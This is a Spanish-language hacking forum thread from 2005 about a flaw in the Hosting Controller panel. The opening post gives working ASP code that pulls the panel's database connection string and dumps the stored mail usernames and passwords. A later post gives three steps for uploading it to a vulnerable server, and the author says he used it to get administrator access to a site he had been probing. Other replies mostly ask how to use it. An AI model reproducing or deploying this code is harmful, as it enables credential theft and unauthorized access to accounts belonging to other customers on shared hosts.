elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 07:02  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Bug en Hosting Controller para robar users y passwords
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Bug en Hosting Controller para robar users y passwords  (Leído 1,582 veces)
Morris
Ex-CoAdmin y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.966


Ver Perfil WWW
Bug en Hosting Controller para robar users y passwords
« en: 10 Junio 2005, 01:18 »

Haciendo pruebas me he querido robar los user y pwds del hosting controller y me he dado cuenta que permite utilizar el string de conexión desde cualquier dominio, sin mayores permisos, por lo que con un mínimo de programación se pueden listar todas las tablas y campos, y de esta forma he logrado realizar un query que devuelve los users y sus pwds... No he probado con versiones muy recientes de este panel, ya que no tengo más elementos para lograrlo...

Salu2

Código:
<%
'globals

set gadmobj = server.CreateObject("AdvAdmin.AccountAdmin")
ConnString = gadmobj.GetStrAdvReg("General","ConnString")
set gadmobj = nothing
Application("Connection1_ConnectionString") = ConnString

set conn = Server.createobject("ADODB.Connection")
conn.Open Application("Connection1_ConnectionString")
strSQL = "select UserName,Password From Mail"
set rs1 = conn.Execute(strSQL)
    IF NOT RS1.EOF THEN
%>
User: <%=rs1("UserName")%><BR>
Pwd: <%=rs1("Password")%><BR>

<%
      rs1.MoveNext
      rs1.Close
    END IF
conn.Close
%>
« Última modificación: 10 Junio 2005, 01:22 por Morris » En línea

edipo

Desconectado Desconectado

Mensajes: 21


Ver Perfil
Re: Bug en Hosting Controller para robar users y passwords
« Respuesta #1 en: 18 Junio 2005, 00:42 »

haber loco esplicate mejor  paso a paso si...............................
En línea
cero_rar

Desconectado Desconectado

Mensajes: 17


www.hackcero.tk


Ver Perfil
Re: Bug en Hosting Controller para robar users y passwords
« Respuesta #2 en: 18 Junio 2005, 06:11 »

pUES QEU NECESITAS MAS O QUE TE FALTA PORQ  SE VE INTERESANTE PERO NO ME CONVENCE DEL TODO
En línea
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Re: Bug en Hosting Controller para robar users y passwords
« Respuesta #3 en: 18 Junio 2005, 11:32 »

Morris lo has reportado?

Es un fallo de seguridad muy grande, y yo no me suena haber visto publicado nada sobre eso, deberias reportarlo y luego publicarlo, y hacer mas pruebas para ver versiones afectadas.

Muy buen descubrimiento!!! enhorabuena
En línea
rodimus

Desconectado Desconectado

Mensajes: 42



Ver Perfil
Re: Bug en Hosting Controller para robar users y passwords
« Respuesta #4 en: 18 Junio 2005, 19:34 »

para los mas novatos podrias explicar la forma de usarlo ...como serie compilandolo en visual y nada mas o hay que cambiar algo ????? porfavor explicame
En línea
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: Bug en Hosting Controller para robar users y passwords
« Respuesta #5 en: 19 Junio 2005, 05:01 »

para los mas novatos podrias explicar la forma de usarlo ...como serie compilandolo en visual y nada mas o hay que cambiar algo ????? porfavor explicame

lo subes a un host con sistema hosting controller y puedes ver todos los usuarios y passwords que aloja... es como una shelll...


saludos
En línea

Conthackto.com.mx
Morris
Ex-CoAdmin y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.966


Ver Perfil WWW
Re: Bug en Hosting Controller para robar users y passwords
« Respuesta #6 en: 21 Junio 2005, 17:07 »

No lo he publicado, ni probado en más versiones, el panel que exploté es un tanto viejo, pero todavía hay varios servidores usándolo, aclaro NO ES la versión más nueva. Lo que sucede es que lo probé en un sitio en el que he estado jugando y tenían este panel :P

Es un bug muy tonto ya que te permite usar el DNS de conexión al panel de control desde cualquier dominio alojado en el servidor, lo que resulta en ver toda la información dentro de la base de datos. Logré listar todas las tablas y de ahí todas las columnas, y descubrí que el user y el password se guardan en una de las tablas y me permitió entrar al panel como administrador del dominio.

En fin:

1.- COPIAR CODIGO Y GUARDAR COMO .ASP
2.- SUBIR AL SERVIDOR EN UNA DIRECCION PUBLICA
3.- INGRESAR POR WEB (Si el servidor es vulnerable, regresará el user y el pwd)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines